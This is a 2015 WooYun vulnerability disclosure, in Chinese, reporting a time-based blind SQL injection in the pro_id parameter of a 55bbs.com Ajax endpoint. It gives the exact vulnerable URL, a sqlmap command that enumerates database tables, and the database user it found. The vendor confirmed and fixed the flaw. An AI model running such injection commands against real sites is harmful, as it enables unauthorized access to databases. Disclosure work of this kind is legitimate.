当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125256

漏洞标题:我爱购物网某站一处隐蔽的sql注入(时间盲注)

相关厂商:55bbs.com

漏洞作者: Y4ngshu

提交时间:2015-07-08 09:16

修复时间:2015-08-22 12:54

公开时间:2015-08-22 12:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-08: 细节已通知厂商并且等待厂商处理中
2015-07-08: 厂商已经确认,细节仅向厂商公开
2015-07-18: 细节向核心白帽子及相关领域专家公开
2015-07-28: 细节向普通白帽子公开
2015-08-07: 细节向实习白帽子公开
2015-08-22: 细节向公众公开

简要描述:

挖挖挖挖,撸撸撸,发现一枚上报一枚,没有分开刷请原谅\我爱wooyun,求首页啊,冲个实习帽子,么么哒

详细说明:

问题站点

http://baby.55bbs.com/index.php?c=Ajax&a=AjaxProInfo&pro_id=5

注入点:pro_id
ajax传输数据的时候没有过滤好,手工测试,发现盲注一枚

3_1.png


紧接着丢进sqlmap,判断正确,确实存在注入

3_2.png


数据库用户

current_user:55babay@10.15.18%


有3个数据库

3_3.png


55baby这个数据命名有点逗 需要加``然后""引起来才能跑数据

sqlmap -u "http://baby.55bbs.com/index.php?c=Ajax&a=AjaxProInfo&pro_id=" --tables -D "`55baby`"


3_4.png

没有深入去看有多少数据,仅仅验证性的截图证明

漏洞证明:

已证明

修复方案:

表面上的数据交互我们或许处理的很好,但是一定不要忘记别有用心的人们会找到系统任何一个传输数据并且没有过滤的地方,希望厂商多多排查,//我爱wooyun 实习白帽我来了

版权声明:转载请注明来源 Y4ngshu@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-08 12:53

厂商回复:

漏洞已修复,感谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-23 17:15 | 日出东方 ( 普通白帽子 | Rank:157 漏洞数:51 )

    大哥你用的这个插件叫什么?

  2. 2015-08-23 17:29 | 日出东方 ( 普通白帽子 | Rank:157 漏洞数:51 )

    看你发了两个这样的漏洞,这样的注入点是这么发现的呢?能给讲讲吗?